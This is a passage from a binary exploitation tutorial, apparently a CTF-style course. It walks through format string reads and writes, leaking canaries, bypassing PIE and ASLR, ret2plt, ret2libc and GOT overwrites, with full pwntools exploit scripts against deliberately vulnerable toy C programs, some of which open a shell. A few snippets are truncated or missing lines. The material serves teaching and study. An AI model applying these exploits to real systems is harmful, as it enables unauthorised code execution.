You may notice that the last values contain the hex values of %x . That's because
we're reading the buffer. Here it's at the 4th offset - if we can write an address then
point %s at it, we can get an arbitrary read!
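To see that those leaked words really are our own input, the following sketch repacks the last three values from the output above as little-endian 32-bit words. The helper name is made up for this example.

```python
import struct

# The 4th, 5th and 6th values leaked in the run above.
leaked = [0x782573FC, 0x20782520, 0x25207825]


def words_to_bytes(words):
    """Turn 32-bit values back into the bytes as they sit in memory."""
    return b"".join(struct.pack("<I", w) for w in words)


raw = words_to_bytes(leaked)
print(raw)
```

The first two bytes belong to whatever sits before the buffer, which suggests the buffer does not start on a 4-byte boundary in this binary; everything after that is the "%x %x ..." string we typed.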
$ ./vuln
ABCD|%6$p
ABCD|0x44434241
As we can see, we're reading the value we inputted. Let's write a quick pwntools script
that writes the base address of the ELF file into the buffer and reads from it with %s - if
all goes well, it should read the first bytes of the file, which are always \x7fELF .
Start with the basics:
from pwn import *
p = process('./vuln')
payload = p32(0x41424344)
payload += b'|%6$p'
p.sendline(payload)
log.info(p.clean())
$ python3 exploit.py
Nice, it works. The base address of the binary is 0x8048000 , so let's replace the
0x41424344 with that and read it with %s :
p = process('./vuln')
payload = p32(0x8048000)
payload += b'|%6$s'
p.sendline(payload)
log.info(p.clean())
It doesn't work.
The reason it doesn't work is that printf stops at null bytes, and the very first
character is a null byte. We have to put the format specifier first.
p = process('./vuln')
payload = b'%8$p||||'
payload += p32(0x8048000)
p.sendline(payload)
log.info(p.clean())
We add 4 | characters because we want the address we write to fill exactly one 4-byte
stack slot, not half of one and half of another, as that would result in reading the wrong
address.
The offset is %8$p because the start of the buffer is at %6$p . Stack slots are 4 bytes
long each and the format specifier plus padding already takes up 8 bytes, so the address
sits two slots further along, at %8$p .
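The offset arithmetic can be written down as a small helper. This is a sketch under the assumptions in the text (32-bit, buffer starting at offset 6); the function name is hypothetical and struct stands in for p32().

```python
import struct

WORD = 4  # bytes per stack slot on 32-bit


def address_offset(buffer_offset, prefix):
    """Offset at which an address placed right after `prefix` will be read."""
    if len(prefix) % WORD != 0:
        raise ValueError("prefix must fill whole stack slots")
    return buffer_offset + len(prefix) // WORD


prefix = b"%8$p||||"  # specifier plus padding, 8 bytes in total
payload = prefix + struct.pack("<I", 0x8048000)

print(address_offset(6, prefix))
```

If the prefix grows (for example, a two-digit offset), re-run the calculation, as the number inside the specifier has to match the slot the address ends up in.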
$ python3 exploit.py
It still stops at the null byte, but that's not important because we get the output;
the address is still written to memory, just not printed back.
$ python3 exploit.py
Of course, %s will also stop at a null byte as strings in C are terminated with them. We
have worked out, however, that the first bytes of an ELF file up to a null byte are
\x7fELF\x01\x01\x01 .
Arbitrary Writes
Luckily there are other format string specifiers for that. I fully recommend you watch
this video to completely understand it, but let's jump into a basic binary.
#include <stdio.h>
int auth = 0;
int main() {
char password[100];
puts("Password: ");
fgets(password, sizeof password, stdin);
printf(password);
printf("Auth is %i\n", auth);
if(auth == 10) {
puts("Authenticated!");
}
}
Simple - we need to overwrite the variable auth with the value 10. The format string
vulnerability is obvious, and there is no buffer overflow because fgets bounds the read.
As it's a global variable, it's within the binary itself. We can check the location using
readelf to check for symbols.
We're lucky there are no null bytes, so there's no need to change the order.
$ ./auth
Password:
%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20
AUTH = 0x804c028
p = process('./auth')
payload = p32(AUTH)
payload += b'|' * 6 # We need to write the value 10, AUTH is 4 byt
payload += b'%7$n'
print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))
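The reason for exactly six padding characters is just counting: %n stores the number of characters printed so far. A minimal sketch of that count, using struct in place of p32() and assuming each byte of the packed address is printed as one character:

```python
import struct

AUTH = 0x804C028  # address of auth, as found above

payload = struct.pack("<I", AUTH) + b"|" * 6 + b"%7$n"

# Everything before the specifier is printed verbatim before %n is processed.
printed_before_n = payload.index(b"%7$n")
print(printed_before_n)
```

Four address bytes plus six | characters gives the 10 that the program checks for.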
Pwntools
As you can expect, pwntools has a handy feature for automating %n format string
exploits:
The offset in this case is 7 because the 7th %p reads the start of the buffer; the
location is the address you want to write to and the value is what you want to write
there. Note that you can add as many location-value pairs into the dictionary as you want.
You can also grab the location of the auth symbol with pwntools:
elf = ELF('./auth')
AUTH = elf.sym['auth']
Stack Canaries
The Buffer Overflow defence
Stack Canaries are very simple - at the beginning of the function, a random value is
placed on the stack. Before the program executes ret , the current value of that
variable is compared to the initial: if they are the same, no buffer overflow has
occurred.
If they are not, the attacker attempted to overflow to control the return pointer and
the program crashes, often with a ***stack smashing detected*** error message.
On Linux, stack canaries end in 00 . This is so that they null-terminate any strings in case
you make a mistake when using print functions, but it also makes them much easier to
spot.
Bypassing Canaries
There are two ways to bypass a canary.
Leaking it
This is quite broad and will differ from binary to binary, but the main aim is to read the
value. The simplest option is using a format string vulnerability if one is present - the
canary, like other local variables, is on the stack, so if we can leak values off the stack
it's easy.
Source
#include <stdio.h>
void vuln() {
char buffer[64];
puts("Leak me");
gets(buffer);
printf(buffer);
puts("");
puts("Overflow me");
gets(buffer);
}
int main() {
vuln();
}
void win() {
puts("You won!");
}
The source is very simple - it gives you a format string vulnerability, then a buffer
overflow vulnerability. The format string we can use to leak the canary value, then we
can use that value to overwrite the canary with itself. This way, we can overflow past
the canary but not trigger the check as its value remains constant. And of course, we
just have to run win() .
32-bit
Yup, there is. Now we need to work out what offset the canary is at, and to do this
we'll use radare2.
$ r2 -d -A vuln-32
[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
%p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60 0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e |...............
0xffd7cd70 0x08048034 0x00000000 0xf7f57000 0x00007025 4........p..%p..
0xffd7cd80 0x00000000 0x00000000 0x08048034 0xf7f02a28 ........4...(*..
0xffd7cd90 0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade .............:..
0xffd7cda0 0xf7f013fc 0xffffffff 0x00000000 0x080492cb ................
0xffd7cdb0 0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00 ................
The last value there is the canary. We can tell because it's roughly 64 bytes after the
"buffer start", which should be close to the end of the buffer. Additionally, it ends in
00 and looks very random, unlike the libc and stack addresses that start with f7 and
ff . If we count the number of addresses it's around 24 until that value, so we check one
before and one after as well to make sure.
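The same eyeballing can be expressed as a rough filter over the dumped words. This is only a heuristic sketch: the rule "ends in 00, is not zero, does not start with f7 or ff" is taken from the reasoning above and is specific to this dump, and it assumes the dump was taken at the call to printf so that word 0 is the format string pointer.

```python
# The 24 words from the pxw output above, in order from ESP.
words = [
    0xFFD7CD7C, 0xFFD7CDEC, 0x00000002, 0x0804919E,
    0x08048034, 0x00000000, 0xF7F57000, 0x00007025,
    0x00000000, 0x00000000, 0x08048034, 0xF7F02A28,
    0xF7F01000, 0xF7F3E080, 0x00000000, 0xF7D53ADE,
    0xF7F013FC, 0xFFFFFFFF, 0x00000000, 0x080492CB,
    0x00000001, 0xFFD7CE84, 0xFFD7CE8C, 0xADC70E00,
]


def looks_like_canary(word):
    """Low byte is 00, value is non-zero, and it is not a libc/stack address."""
    top_byte = word >> 24
    return word != 0 and (word & 0xFF) == 0 and top_byte not in (0xF7, 0xFF)


candidates = [(i, hex(w)) for i, w in enumerate(words) if looks_like_canary(w)]
print(candidates)
```

Under that assumption the 0-based index of a word is also its %N$p offset, because word 0 is the format string argument itself.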
$./vuln-32
Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)
It appears to be at %23$p . Remember, stack canaries are randomised for each new
process, so it won't be the same.
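from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline(b'%23$p')
canary = int(p.recvline(), 16)  # parse the leaked hex value
log.success(f'Canary: {hex(canary)}')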
$ python3 exploit.py
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300
Now all that's left is to work out what the offset is until the canary, and then the offset
from after the canary to the return pointer.
$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
%23$p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
[...]
0xffea8af0 0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00
We see the canary is at 0xffea8afc . A little later on the return pointer (we assume) is
at 0xffea8b0c . Let's break just after the next gets() and check what value we
overwrite it with (we'll use a De Bruijn pattern).
[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
0xe1f91c00
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYA
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
0xffea8afc 0x41574141 0x41415841 0x5a414159 0x41614141 AAWAAXAAYAAZAAaA
0xffea8b0c 0x41416241 0x64414163 0x41654141 0x41416641 AbAAcAAdAAeAAfAA
The return pointer is 16 bytes after the start of the canary, so 12 bytes after the end of it.
from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline(b'%23$p')
canary = int(p.recvline(), 16)  # leaked canary value
payload = b'A' * 64
payload += p32(canary)  # overwrite the canary with its own value so the check passes
payload += b'A' * 12  # pad to return pointer
payload += p32(0x08049245)
p.clean()
p.sendline(payload)
print(p.clean().decode('latin-1'))
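The padding figure can be double-checked from the two addresses seen in the debugger. A minimal sketch, with struct standing in for p32() and the canary value taken from that particular debug run (it will differ on every execution):

```python
import struct

CANARY_ADDR = 0xFFEA8AFC  # where the canary sat in the radare2 session
RET_ADDR = 0xFFEA8B0C     # where the return pointer sat
CANARY_SIZE = 4           # 32-bit canary

padding_after_canary = RET_ADDR - (CANARY_ADDR + CANARY_SIZE)


def build_payload(canary, target, buf_len=64):
    """Buffer fill, canary, padding, then the new return address."""
    return (
        b"A" * buf_len
        + struct.pack("<I", canary)
        + b"A" * padding_after_canary
        + struct.pack("<I", target)
    )


payload = build_payload(0xE1F91C00, 0x08049245)
print(padding_after_canary, len(payload))
```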
64-bit
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
Remember, in 64-bit the first few printf arguments come from registers before the stack,
and each value is 8 bytes wide, so the offset may be different.
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.
As you can expect, the general idea is to run the process loads and loads of times with
random canary values until you get a hit, which you can differentiate by the presence of
a known plaintext, e.g. flag{ . This can take ages to run and is frankly not a
particularly interesting challenge.
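A quick back-of-the-envelope calculation shows why the word size matters so much. The sketch assumes, as stated earlier, that the lowest byte of the canary is always 00 and that the remaining bytes are uniformly random; the function name is made up.

```python
def canary_search_space(word_bytes):
    """Number of possible canaries when only the low byte is fixed."""
    return 256 ** (word_bytes - 1)


space_32 = canary_search_space(4)
space_64 = canary_search_space(8)

print(space_32)             # 16777216
print(space_64 // space_32)  # how many times larger the 64-bit space is
```

Around 16.7 million guesses is slow but doable; multiplying that by 2^32 is not.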
PIE
Position Independent Code
Overview
PIE stands for Position Independent Executable, which means that every time you run
the file it gets loaded into a different memory address. This means you cannot
hardcode values such as function addresses and gadget locations without finding out
where they are.
Analysis
Luckily, this does not mean it's impossible to exploit. PIE executables are based around
relative rather than absolute addresses, meaning that while the locations in memory
are fairly random the offsets between different parts of the binary remain constant.
For example, if you know that the function main is located 0x128 bytes in memory
after the base address of the binary, and you somehow find the location of main , you
can simply subtract 0x128 from this to get the base address, and from that the addresses
of everything else.
Exploitation
So, all we need to do is find a single address and PIE is bypassed. Where could we leak
this address from?
We know that the return pointer is located on the stack - and much like a canary, we
can use format string (or other ways) to read the value off the stack. The value will
always be a static offset away from the binary base, enabling us to completely bypass
PIE!
Double-Checking
Due to the way PIE randomisation works, the base address of a PIE executable will
always end in the hexadecimal characters 000 . This is because pages are the things
being randomised in memory, which have a standard size of 0x1000 . Operating
Systems keep track of page tables which point to each section of memory and define
the permissions for each section, similar to segmentation.
Checking the base address ends in 000 should probably be the first thing you do if
your exploit is not working as you expected.
Not to mention that the ROP capabilities are incredibly powerful as well.
The Source
#include <stdio.h>
void vuln();
int main() {
    vuln();
    return 0;
}
void vuln() {
    char buffer[20];
    printf("Main Function is at: %p\n", (void *)main);
    gets(buffer);
}
void win() {
    puts("PIE bypassed! Great job :D");
}
Pretty simple - we print the address of main , which we can read and calculate the base
address from. Then, using this, we can calculate the address of win() itself.
Analysis
Let's just run the binary to make sure it's the right one :D
$ ./vuln-32
Main Function is at: 0x5655d1b9
Exploitation
First, let's set up the script. We create an ELF object, which becomes very useful later
on, and start the process.
Now we want to take in the main function location. To do this we can simply receive
up until it (and do nothing with that) and then read it.
p.recvuntil('at: ')
main = int(p.recvline(), 16)
Since we received the entire line except for the address, only the address will come up
with p.recvline() .
Now we'll use the ELF object we created earlier and set its base address. The sym
dictionary returns the offsets of the functions from the binary base until the base address
is set, after which it returns the absolute address in memory.
In this case, elf.sym['main'] will return 0x11b9 ; once the base address is set, it would
return 0x11b9 + the base address. So, essentially, we're subtracting the offset of main from
the address we leaked to get the base of the binary.
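The subtraction itself can be checked with plain integers. This sketch uses the leak from the sample run and the 0x11b9 offset quoted above; the offset of win is a hypothetical value picked purely for illustration.

```python
MAIN_OFFSET = 0x11B9      # elf.sym['main'] before the base is set
WIN_OFFSET = 0x11E2       # hypothetical offset of win, for illustration
leaked_main = 0x5655D1B9  # value printed in the sample run

base = leaked_main - MAIN_OFFSET

# A sane PIE base is page-aligned, i.e. ends in 000.
assert base & 0xFFF == 0, "base is not page-aligned, check the leak"

win = base + WIN_OFFSET
print(hex(base), hex(win))
```

Setting elf.address in pwntools does this same arithmetic for every symbol at once.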
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
By this point, I assume you know how to find the padding length and other stuff we've
been mentioning for a while, so I won't be showing you every step of that.
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D
Awesome!
Final Exploit
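from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil(b'at: ')
main = int(p.recvline(), 16)
elf.address = main - elf.sym['main']  # rebase the ELF on the leaked address
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))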
Summary
From the leaked address of main , we were able to calculate the base address of the
binary. From this we could then calculate the address of win and call it.
And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of
code, at least half of which is scaffolding and setup.
64-bit
Try this for yourself first, then feel free to check the solution. Same source, same
challenge.
PIE Bypass
Using format string
The Source
#include <stdio.h>
void vuln() {
char buffer[20];
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
Unlike last time, we aren't given the address of a function. We'll have to leak one with format strings.
Analysis
$ ./vuln-32
Everything's as we expect.
Exploitation
Setup
PIE Leak
$ ./vuln-32
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1
3rd one looks like a binary address, let's check the difference between the 3rd leak and
the base address in radare2. Set a breakpoint somewhere after the format string leak
(doesn't really matter where).
$ r2 -d -A vuln-32
We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5 .
Therefore, subtracting 0x11d5 from the leaked address should give us the binary base.
Let's leak the value and get the base address.
p.recvuntil(b'name?\n')
p.sendline(b'%3$p')
p.recvuntil(b'you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5  # leak minus its offset from the binary base
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil(b'message?\n')
p.sendline(payload)
print(p.clean().decode())
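The offset used to rebase the binary comes straight from the two values seen in the radare2 session. As a sanity check, the sketch below derives it and then applies it to the third value leaked in the earlier ./vuln-32 run; the helper name is made up.

```python
base_seen = 0x565EF000  # base address during the debug session
leak_seen = 0x565F01D5  # 3rd %p value during the same session

offset = leak_seen - base_seen
print(hex(offset))


def base_from_leak(leak):
    """Recover the binary base from a fresh leak of the same stack value."""
    return leak - offset


# Third value from the earlier run of ./vuln-32.
other_base = base_from_leak(0x565D31D5)
print(hex(other_base))
```

Both bases end in 000, which is a good sign that the right offset is being subtracted.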
Final Exploit
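from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil(b'name?\n')
p.sendline(b'%3$p')
p.recvuntil(b'you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5  # leak minus its offset from the binary base
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil(b'message?\n')
p.sendline(payload)
print(p.clean().decode())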
64-bit
Same deal, just 64-bit. Try it out :)
ASLR
Address Space Layout Randomisation
Overview
ASLR stands for Address Space Layout Randomisation and can, in most cases, be
thought of as libc 's equivalent of PIE - every time you run a binary, libc (and other
libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as libc PIE, there is a key difference.
ASLR is a kernel protection while PIE is a binary protection. The main difference is that
PIE can be compiled into the binary while the presence of ASLR is completely
dependent on the environment running the binary. If I sent you a binary that I compiled
with ASLR disabled on my machine, it wouldn't make any difference at all if you had ASLR
enabled.
Of course, as with PIE, this means you cannot hardcode values such as function addresses
(e.g. system for a ret2libc).
When functions finish execution, they do not get removed from memory; instead, they
just get ignored and overwritten. Chances are very high that you will grab one of these
remnants with the format string. Different libc versions can act very differently during
execution, so a value you just grabbed may not even exist remotely, and if it does the
offset will most likely be different (different libcs have different sizes and therefore
different offsets between functions). It's possible to get lucky, but you shouldn't really
hope that the offsets remain the same.
Instead, a more reliable way is reading the GOT entry of a specific function.
Double-Checking
For the same reason as PIE, libc base addresses always end in the hexadecimal
characters 000 .
The Source
#include <stdio.h>
#include <stdlib.h>
void vuln() {
    char buffer[20];
    printf("System is at: %p\n", (void *)system);
    gets(buffer);
}
int main() {
    vuln();
    return 0;
}
void win() {
    puts("PIE bypassed! Great job :D");
}
Just as we did for PIE, except this time we print the address of system.
Analysis
$ ./vuln-32
System is at: 0xf7de5f00
Your address of system might end in different characters - that just means you have a
different libc version.
Exploitation
Much of this is as we did with PIE.
Note that we include the libc here - this is just another ELF object that makes our lives
easier.
Parse the address of system and calculate libc base from that (as we did with PIE):
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
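The libc base falls out of the same subtraction as with PIE. In the sketch below the leak is the one from the sample run, but both offsets are hypothetical stand-ins for what libc.sym['system'] and the /bin/sh search would return for your libc.

```python
SYSTEM_OFFSET = 0x44F00   # hypothetical offset of system in libc
BINSH_OFFSET = 0x18C32B   # hypothetical offset of the "/bin/sh" string
system_leak = 0xF7DE5F00  # value printed in the sample run

libc_base = system_leak - SYSTEM_OFFSET

# Like a PIE base, a libc base should be page-aligned.
assert libc_base & 0xFFF == 0, "libc base is not page-aligned"

binsh = libc_base + BINSH_OFFSET
print(hex(libc_base), hex(binsh))
```

If the assertion fails with real values, the most likely cause is that the offsets come from a different libc version than the one the target is running.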
Now we can finally ret2libc, using the libc ELF object to really simplify it for us:
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
Final Exploit
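from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvuntil(b'at: ')
system_leak = int(p.recvline(), 16)
libc.address = system_leak - libc.sym['system']  # libc base from the leak
payload = flat(
    b'A' * 32,
    libc.sym['system'],
    0x0, # return address
    next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()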
64-bit
Try it yourself :)
Using pwntools
If you prefer, you could change the following payload to be more pwntoolsy:
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
into something like this:
binsh = next(libc.search(b'/bin/sh'))
rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)
p.sendline(rop.chain())
The benefit of this is it's (arguably) more readable, but also makes it much easier to
reuse in 64-bit exploits as all the parameters are automatically resolved for you.
The PLT and GOT are sections within an ELF file that deal with a large portion of the
dynamic linking. Dynamically linked binaries are more common than statically linked
binaries in CTFs. The purpose of dynamic linking is that binaries do not have to carry all
the code necessary to run within them - this reduces their size substantially. Instead,
they rely on system libraries (especially libc , the C standard library) to provide the
bulk of the functionality.
For example, each ELF file will not carry its own version of puts compiled within it -
it will instead dynamically link to the puts of the system it is on. As well as smaller
binary sizes, this also means the user can continually upgrade their libraries, instead of
having to redownload all the binaries every time a new version comes out.
So when it's on a new system, it replaces function calls with hardcoded addresses?
Not quite.
The problem with this approach is it requires libc to have a constant base address,
i.e. be loaded in the same area of memory every time it's run, but remember that ASLR
exists. Hence the need for dynamic linking. Due to the way ASLR works, these
addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
When you call puts() in C and compile it as an ELF executable, it is not actually
puts() - instead, it gets compiled as puts@plt . Check it out in GDB:
Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry
of puts instead. From here, puts@plt does some very specific things:
If there is a GOT entry for puts , it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in
memory of the libc functions. puts@got , for example, will contain the address of
puts in memory. When the PLT gets called, it reads the GOT address and redirects
execution there. If the address is empty, it coordinates with the ld.so (also called the
dynamic linker/loader) to get the function address and stores it in the GOT.
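The resolve-once-then-reuse behaviour can be mimicked with a toy model. This is deliberately simplified and follows the description above rather than the real mechanics: the class and method names are invented, and a Python dict stands in for the GOT.

```python
class ToyProcess:
    """Toy model of lazy binding: the PLT stub consults the GOT first."""

    def __init__(self, libc):
        self.libc = libc      # name -> callable, standing in for libc
        self.got = {}         # starts empty, filled on first use
        self.resolutions = 0  # how often the "dynamic linker" was asked

    def resolve(self, name):
        # Stand-in for ld.so looking the symbol up and caching it.
        self.resolutions += 1
        self.got[name] = self.libc[name]

    def plt(self, name, *args):
        if name not in self.got:
            self.resolve(name)
        return self.got[name](*args)


proc = ToyProcess({"puts": lambda s: len(s)})
first = proc.plt("puts", "hi")
second = proc.plt("puts", "again")
print(proc.resolutions)
```

Only the first call triggers a resolution; every later call goes straight through the cached GOT entry.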
Calling the PLT address of a function is equivalent to calling the function itself.
The GOT contains the addresses of functions in libc , and the GOT is within the
binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc function,
for example system , we can just redirect execution to its PLT entry and it will be the
equivalent of calling system directly; no need to jump into libc .
The second point is less obvious, but debatably even more important. As the GOT is
part of the binary, it will always be a constant offset away from the base. Therefore, if
PIE is disabled or you somehow leak the binary base, you know the exact address that
contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to
leak the real address of the libc function and therefore bypass ASLR.
ret2plt
A ret2plt is a common technique that involves calling puts@plt and passing the GOT
entry of puts as a parameter. This causes puts to print out its own address in libc .
You then set the return address to the function you are exploiting in order to call it
again.
# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)
# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts'],
elf.plt['puts'],
elf.symbols['main']
)
flat() packs all the integer values you give it with p32() or p64() (depending on context)
and concatenates them, meaning you don't have to write the packing functions out all the
time.
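To show roughly what that packing amounts to, here is a stripped-down imitation using struct. It is not pwntools' implementation and handles only bytes and integers; the function name and the address are made up for the example.

```python
import struct


def flat_sketch(items, word_bits=32):
    """Concatenate items, packing integers as little-endian words."""
    fmt = "<I" if word_bits == 32 else "<Q"
    out = b""
    for item in items:
        if isinstance(item, bytes):
            out += item  # raw bytes pass through unchanged
        else:
            out += struct.pack(fmt, item)
    return out


packed_32 = flat_sketch([b"AAAA", 0x08049030])
packed_64 = flat_sketch([b"AAAA", 0x08049030], word_bits=64)
print(packed_32, len(packed_64))
```

The real flat() picks the word size from the pwntools context, which is why setting context.binary early in a script matters.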
%s format string
This has the same general theory but is useful when you have limited stack space or a
ROP chain would alter the stack in such a way to complicate future payloads, for
example when stack pivoting.
# this part is only relevant if you need to call the function again
# Send it off...
Summary
The PLT and GOT do the bulk of dynamic linking
The PLT resolves actual locations in libc of functions you use and stores them in
the GOT
Next time that function is called, it jumps to the address stored in the GOT and
resumes execution there
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating
libc base
Overview
This time around, there's no leak. You'll have to use the ret2plt technique explained
previously. Feel free to have a go before looking further on.
#include <stdio.h>
void vuln() {
puts("Come get me");
char buffer[20];
gets(buffer);
}
int main() {
vuln();
return 0;
}
Analysis
We're going to have to leak the libc base somehow, and the only logical way is a ret2plt.
We're not struggling for space as gets() takes in as much data as we want.
Exploitation
All the basic setup
Now we want to send a payload that leaks the real address of puts . As mentioned
before, calling the PLT entry of a function is the same as calling the function itself; if we
point the parameter to the GOT entry, it'll print out its actual location. This is because
in C string arguments for functions actually take a pointer to where the string can be
found, so pointing it to the GOT entry (which we know the location of) will print it out.
payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)
But why is there a main there? Well, if we set the return address to random jargon,
we'll leak libc base but then it'll crash; if we call main again, however, we essentially
restart the binary - except we now know libc base so this time around we can do a
ret2libc.
p.sendline(payload)
puts_leak = u32(p.recv(4))
p.recvlines(2)
Remember that the GOT entry won't be the only thing printed - puts , and most
functions in C, print until a null byte. This means it will keep on printing GOT
addresses, but the only one we care about is the first one, so we grab the first 4 bytes
and use u32() to interpret them as a little-endian number. After that we ignore
the rest of the values as well as the Come get me from calling main again.
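The parsing step can be tried offline on simulated output. In this sketch struct.unpack plays the role of u32(), and the received bytes, the leaked address and the puts offset are all invented for illustration.

```python
import struct

PUTS_OFFSET = 0x6D460  # hypothetical offset of puts in libc

# Simulated output: the puts GOT entry, then the next entry, then a newline.
received = struct.pack("<I", 0xF7E0E460) + b"\x10\x40\xdf\xf7\n"

# Only the first 4 bytes are the address we asked for.
puts_leak = struct.unpack("<I", received[:4])[0]
libc_base = puts_leak - PUTS_OFFSET

print(hex(puts_leak), hex(libc_base))
```

Anything after the first four bytes is just whatever followed in the GOT until puts hit a null byte, which is why it is discarded.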
From here, we simply calculate libc base again and perform a basic ret2libc:
payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'], # exit is not required here, it's just n
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()
Final Exploit
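from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvline()
payload = flat(
    b'A' * 32,
    elf.plt['puts'],
    elf.sym['main'],
    elf.got['puts']
)
p.sendline(payload)
puts_leak = u32(p.recv(4))
p.recvlines(2)
libc.address = puts_leak - libc.sym['puts']  # libc base from the leaked puts address
payload = flat(
    b'A' * 32,
    libc.sym['system'],
    libc.sym['exit'],
    next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()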
64-bit
You know the drill - try the same thing for 64-bit. If you want, you can use pwntools'
ROP capabilities - or, to make sure you understand calling conventions, be daring and
do both :P
GOT Overwrite
Hijacking functions
You may remember that the GOT stores the actual locations in libc of functions.
Well, if we could overwrite an entry, we could gain code execution that way. Imagine
the following code:
char buffer[20];
gets(buffer);
printf(buffer);
There is both a buffer overflow and a format string vulnerability here. Say we
used that format string to overwrite the GOT entry of printf with the location of
system . The code would essentially behave like the following:
char buffer[20];
gets(buffer);
system(buffer);
Source
#include <stdio.h>
void vuln() {
char buffer[300];
while(1) {
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
puts("");
}
}
int main() {
vuln();
return 0;
}
Infinite loop which takes in your input and prints it out to you using printf - no buffer
overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)
Exploitation
As per usual, set it all up
p = process()
Now, to do the %n overwrite, we need to find the offset until we start reading the
buffer.
$ ./got_overwrite
%p %p %p %p %p %p
0x12c 0xf7fa7580 0x8049191 0x340 0x25207025 0x70252070
$./got_overwrite
%5$p
0x70243525
Yes it is!
p.clean()
p.interactive()
Now, next time printf gets called on your input it'll actually be system !
If the buffer is restrictive, you can always send /bin/sh to get you into a shell and run
longer commands.
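Writing a full 32-bit address with a single %n would mean printing billions of characters, so such writes are usually split into smaller pieces. The sketch below works out the padding for two 2-byte writes using the standard %hn specifier. It is one possible approach, not necessarily what pwntools does internally; the function name and the target value are hypothetical.

```python
def hn_write_plan(value, already_written=0):
    """Return [(byte_offset, pad_chars), ...] for two %hn writes of a 32-bit value."""
    # Write the smaller half first, because the printed count only grows.
    halves = sorted([(value & 0xFFFF, 0), (value >> 16 & 0xFFFF, 2)])
    plan = []
    written = already_written
    for target, byte_offset in halves:
        # %hn stores the count modulo 0x10000, so wrap-around is allowed.
        pad = (target - written) % 0x10000
        plan.append((byte_offset, pad))
        written += pad
    return plan


# Hypothetical system address, with two 4-byte addresses already printed.
plan = hn_write_plan(0xF7E12345, already_written=8)
print(plan)
```

Each entry says which half of the GOT entry to target (byte offset 0 or 2) and how many extra characters to print before that %hn.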
Final Exploit
p = process()
p.clean()
p.sendline('/bin/sh')
p.interactive()
64-bit
You'll never guess. That's right! You can do this one by yourself.
ASLR Enabled
If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit
exploits again; you'll have to leverage what we've covered previously.
RELRO
Relocation Read-Only
RELRO is a protection to stop any GOT overwrites from taking place, and it does so very
effectively. There are two types of RELRO, which are both easy to understand.
Partial RELRO
Partial RELRO simply moves the GOT above the program's variables, meaning you can't
overflow into the GOT. This, of course, does not prevent format string overwrites.
Full RELRO
Full RELRO makes the GOT completely read-only, so even format string exploits cannot
overwrite it. This is not the default in binaries because it can make them take
much longer to load, as all the function addresses need to be resolved at once.
Reliable Shellcode
Shellcode, but without the guesswork
